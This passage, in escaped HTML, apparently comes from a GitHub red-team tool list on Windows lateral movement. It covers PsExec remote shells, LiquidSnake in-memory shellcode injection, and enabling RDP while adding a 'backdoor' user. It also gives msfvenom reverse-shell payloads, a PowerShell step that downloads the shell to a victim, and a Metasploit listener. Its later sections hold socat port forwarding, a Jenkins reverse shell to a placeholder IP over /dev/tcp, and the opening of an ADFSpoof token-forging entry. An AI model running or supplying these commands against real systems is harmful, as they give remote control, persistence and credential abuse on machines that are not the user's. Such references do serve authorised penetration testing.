2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePsExec is a part of the Sysinternals suite of tools, which is a collection of utilities for managing and troubleshooting Windows systems.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt is great for remotely executing commands on target machines.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e Some AVs detect PsExec as a 'remote admin' virus.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (PowerShell)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip'\nExpand-Archive -Path 'pstools.zip' -DestinationPath \u0026quot;$env:TEMP\\pstools\u0026quot;\nMove-Item -Path \u0026quot;$env:TEMP\\pstools\\psexec.exe\u0026quot; .\nRemove-Item -Path \u0026quot;$env:TEMP\\pstools\u0026quot; -Recurse\"\u003e\u003cpre\u003eInvoke-WebRequest -Uri \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ehttps://download.sysinternals.com/files/PSTools.zip\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -OutFile \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003epstools.zip\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e\nExpand-Archive -Path \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003epstools.zip\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -DestinationPath \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$env\u003c/span\u003e:TEMP\\pstools\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\nMove-Item -Path \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$env\u003c/span\u003e:TEMP\\pstools\\psexec.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e.\u003c/span\u003e\nRemove-Item -Path \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$env\u003c/span\u003e:TEMP\\pstools\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -Recurse\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Prevent the license agreement from being displayed\npsexec.exe /accepteula\n\n# Run the 'hostname' command on remote machine\npsexec.exe \\\\REMOTECOMPUTER hostname\n\n# Run the 'hostname' command on EVERYTHING (on the domain)\npsexec.exe \\\\* hostname\n\n# Run a local executable on a remote machine\npsexec.exe \\\\REMOTECOMPUTER -c C:\\Tools\\program.exe\n\n# Run the 'hostname' command with different credentials\npsexec.exe \\\\REMOTECOMPUTER hostname -u localadmin -p secret-p@$$word\n\n# Spawn shell on remote machine\npsexec.exe -s \\\\REMOTECOMPUTER cmd\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Prevent the license agreement from being displayed\u003c/span\u003e\npsexec.exe /accepteula\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run the 'hostname' command on remote machine\u003c/span\u003e\npsexec.exe \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eREMOTECOMPUTER hostname\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run the 'hostname' command on EVERYTHING (on the domain)\u003c/span\u003e\npsexec.exe \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003e\u003cspan class=\"pl-k\"\u003e*\u003c/span\u003e hostname\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run a local executable on a remote machine\u003c/span\u003e\npsexec.exe \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eREMOTECOMPUTER -c C:\u003cspan class=\"pl-cce\"\u003e\\T\u003c/span\u003eools\u003cspan class=\"pl-cce\"\u003e\\p\u003c/span\u003erogram.exe\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run the 'hostname' command with different credentials\u003c/span\u003e\npsexec.exe \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eREMOTECOMPUTER hostname -u localadmin -p secret-p@\u003cspan class=\"pl-smi\"\u003e$$\u003c/span\u003eword\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Spawn shell on remote machine\u003c/span\u003e\npsexec.exe -s \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eREMOTECOMPUTER cmd\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGreat \u003ca href=\"https://adamtheautomator.com/psexec/\" rel=\"nofollow\"\u003eblog post\u003c/a\u003e on PsExec usage.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266376-8daa51d6-16d4-4422-b723-d1bc8b7f22e2.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266376-8daa51d6-16d4-4422-b723-d1bc8b7f22e2.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://adamtheautomator.com/psexec/\" rel=\"nofollow\"\u003ehttps://adamtheautomator.com/psexec/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/RiccardoAncarani/LiquidSnake\"\u003eLiquidSnake\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-liquidsnake\" class=\"anchor\" aria-label=\"Permalink: 🔙LiquidSnake\" href=\"#liquidsnake\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLiquid Snake is a program aimed at performing lateral movement against Windows systems without touching the disk.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe tool relies on WMI Event Subscription in order to execute a .NET assembly in memory, the .NET assembly will listen for a shellcode on a named pipe and then execute it using a variation of the thread hijacking shellcode injection.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe project is composed by two separate solutions:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ccode\u003eCSharpNamedPipeLoader\u003c/code\u003e - the component that will be transformed in VBS via GadgetToJScript\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eLiquidSnake\u003c/code\u003e - the component responsible to creating the WMI Event Subscription on the remote system\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOpen both solutions in Visual Studio and build. \u003cem\u003eMake sure to target x64 architecture for the \u003ccode\u003eCSharpNamedPipeLoader\u003c/code\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOutput: Two separate EXEs: \u003ccode\u003eCSharpNamedPipeLoader.exe\u003c/code\u003e and \u003ccode\u003eLiquidSnake.exe\u003c/code\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFull build information can be found \u003ca href=\"https://github.com/RiccardoAncarani/LiquidSnake#building\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUse \u003ccode\u003eLiquidSnake.exe\u003c/code\u003e agains a host where you have administrative access over as follows:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"LiquidSnake.exe \u0026lt;host\u0026gt; [\u0026lt;username\u0026gt; \u0026lt;password\u0026gt; \u0026lt;domain\u0026gt;]\nLiquidSnake.exe dc01.isengard.local\nLiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local\"\u003e\u003cpre\u003eLiquidSnake.exe \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003ehost\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e [\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eusername\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003epassword\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003edomain\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e]\nLiquidSnake.exe dc01.isengard.local\nLiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eIf everything went fine, you should obtain an output similar as the following:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"[*] Event filter created.\n[*] Event consumer created.\n[*] Subscription created, now sleeping\n[*] Sending some DCOM love..\n[*] Sleeping again... long day\"\u003e\u003cpre\u003e[\u003cspan class=\"pl-k\"\u003e*\u003c/span\u003e] Event filter created.\n[\u003cspan class=\"pl-k\"\u003e*\u003c/span\u003e] Event consumer created.\n[\u003cspan class=\"pl-k\"\u003e*\u003c/span\u003e] Subscription created, now sleeping\n[\u003cspan class=\"pl-k\"\u003e*\u003c/span\u003e] Sending some DCOM love..\n[\u003cspan class=\"pl-k\"\u003e*\u003c/span\u003e] Sleeping again... long day\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGeneral usage information can be found \u003ca href=\"https://github.com/RiccardoAncarani/LiquidSnake#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFull \u003ccode\u003eLiquidSnake\u003c/code\u003e usage information can be found \u003ca href=\"https://github.com/RiccardoAncarani/LiquidSnake/tree/main/LiquidSnake\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210986763-2ffe49dd-597b-4ca2-a3ad-674b5fe39624.jpg\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210986763-2ffe49dd-597b-4ca2-a3ad-674b5fe39624.jpg\" alt=\"LiquidSnake\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/RiccardoAncarani/LiquidSnake#usage\"\u003ehttps://github.com/RiccardoAncarani/LiquidSnake#usage\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eEnabling RDP\u003c/h3\u003e\u003ca id=\"user-content-enabling-rdp\" class=\"anchor\" aria-label=\"Permalink: 🔙Enabling RDP\" href=\"#enabling-rdp\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"reg add \u0026quot;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\u0026quot; /v fDenyTSConnections /t REG_DWORD /d 0 /f\nnetsh advfirewall firewall set rule group=\u0026quot;remote desktop\u0026quot; new enable=Yes\nnet localgroup \u0026quot;Remote Desktop Users\u0026quot; \u0026quot;backdoor\u0026quot; /add\"\u003e\u003cpre\u003ereg add \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e /v fDenyTSConnections /t REG_DWORD /d 0 /f\nnetsh advfirewall firewall \u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e rule group=\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eremote desktop\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e new enable=Yes\nnet localgroup \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eRemote Desktop Users\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ebackdoor\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e /add\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eUpgrading shell to meterpreter\u003c/h3\u003e\u003ca id=\"user-content-upgrading-shell-to-meterpreter\" class=\"anchor\" aria-label=\"Permalink: 🔙Upgrading shell to meterpreter\" href=\"#upgrading-shell-to-meterpreter\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eShells (\u003ca href=\"https://infinitelogins.com/tag/payloads/\" rel=\"nofollow\"\u003ehttps://infinitelogins.com/tag/payloads/\u003c/a\u003e)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eAfter getting basic shell access to an endpoint a meterpreter is nicer to continue with.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003e[attacker]\u003c/strong\u003e Generate a meterpreter shell:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe\nmsfvenom -p linux/x86/shell/reverse_tcp LHOST=\u0026lt;IP\u0026gt; LPORT=\u0026lt;PORT\u0026gt; -f elf \u0026gt; shell-x86.elf\"\u003e\u003cpre\u003emsfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe\nmsfvenom -p linux/x86/shell/reverse_tcp LHOST=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e LPORT=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003ePORT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -f elf \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e shell-x86.elf\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/193451669-ff745cf6-e103-4f7e-a266-f7f224dfbb0a.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/193451669-ff745cf6-e103-4f7e-a266-f7f224dfbb0a.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003e[victim]\u003c/strong\u003e Download to victim endpoint:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"powershell \u0026quot;(New-Object System.Net.WebClient).Downloadfile('http://\u0026lt;ip\u0026gt;:8000/shell-name.exe','shell-name.exe')\u0026quot;`\"\u003e\u003cpre\u003epowershell \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e(New-Object System.Net.WebClient).Downloadfile('http://\u0026lt;ip\u0026gt;:8000/shell-name.exe','shell-name.exe')\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e`\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003e[attacker]\u003c/strong\u003e Configure listener:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"use exploit/multi/handler \nset PAYLOAD windows/meterpreter/reverse_tcp \nset LHOST your-ip \nset LPORT listening-port run`\"\u003e\u003cpre\u003euse exploit/multi/handler \n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e PAYLOAD windows/meterpreter/reverse_tcp \n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e LHOST your-ip \n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e LPORT listening-port run\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e`\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003e[victim]\u003c/strong\u003e Execute payload:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Start-Process \u0026quot;shell-name.exe\u0026quot;`\"\u003e\u003cpre\u003eStart-Process \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eshell-name.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e`\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/193452305-91b769a7-96c4-43d3-b3e2-6e31b3afec27.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/193452305-91b769a7-96c4-43d3-b3e2-6e31b3afec27.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eForwarding Ports\u003c/h3\u003e\u003ca id=\"user-content-forwarding-ports\" class=\"anchor\" aria-label=\"Permalink: 🔙Forwarding Ports\" href=\"#forwarding-ports\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSometimes, after gaining access to an endpoint there are local ports. Making these internal ports external routable can help for lateral movement to other services on the host.\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 \u0026amp;\nsocat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT \u0026amp;\"\u003e\u003cpre\u003esocat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 \u003cspan class=\"pl-k\"\u003e\u0026amp;\u003c/span\u003e\nsocat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT \u003cspan class=\"pl-k\"\u003e\u0026amp;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eJenkins reverse shell\u003c/h3\u003e\u003ca id=\"user-content-jenkins-reverse-shell\" class=\"anchor\" aria-label=\"Permalink: 🔙Jenkins reverse shell\" href=\"#jenkins-reverse-shell\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eIf you gain access to a jenkins script console you can use this to gain a reverse shell on the node.\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"r = Runtime.getRuntime()\np = r.exec([\u0026quot;/bin/bash\u0026quot;,\u0026quot;-c\u0026quot;,\u0026quot;exec 5\u0026lt;\u0026gt;/dev/tcp/IP_ADDRESS/PORT;cat \u0026lt;\u0026amp;5 | while read line; do \\$line 2\u0026gt;\u0026amp;5 \u0026gt;\u0026amp;5; done\u0026quot;] as String[])\np.waitFor()\"\u003e\u003cpre lang=\"jenkins\" class=\"notranslate\"\u003e\u003ccode\u003er = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5\u0026lt;\u0026gt;/dev/tcp/IP_ADDRESS/PORT;cat \u0026lt;\u0026amp;5 | while read line; do \\$line 2\u0026gt;\u0026amp;5 \u0026gt;\u0026amp;5; done\"] as String[])\np.waitFor()\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/mandiant/ADFSpoof\"\u003eADFSpoof\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-adfspoof\" class=\"anchor\" aria-label=\"Permalink: 🔙ADFSpoof\" href=\"#adfspoof\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eCreated by Doug Bienstock \u003ca href=\"https://twitter.com/doughsec\" rel=\"nofollow\"\u003e@doughsec\u003c/a\u003e while at Mandiant FireEye.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eADFSpoof has two main functions:\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eGiven the EncryptedPFX blob from the AD FS configuration database and DKM decryption key from Active Directory, produce a usable key/cert pair for token 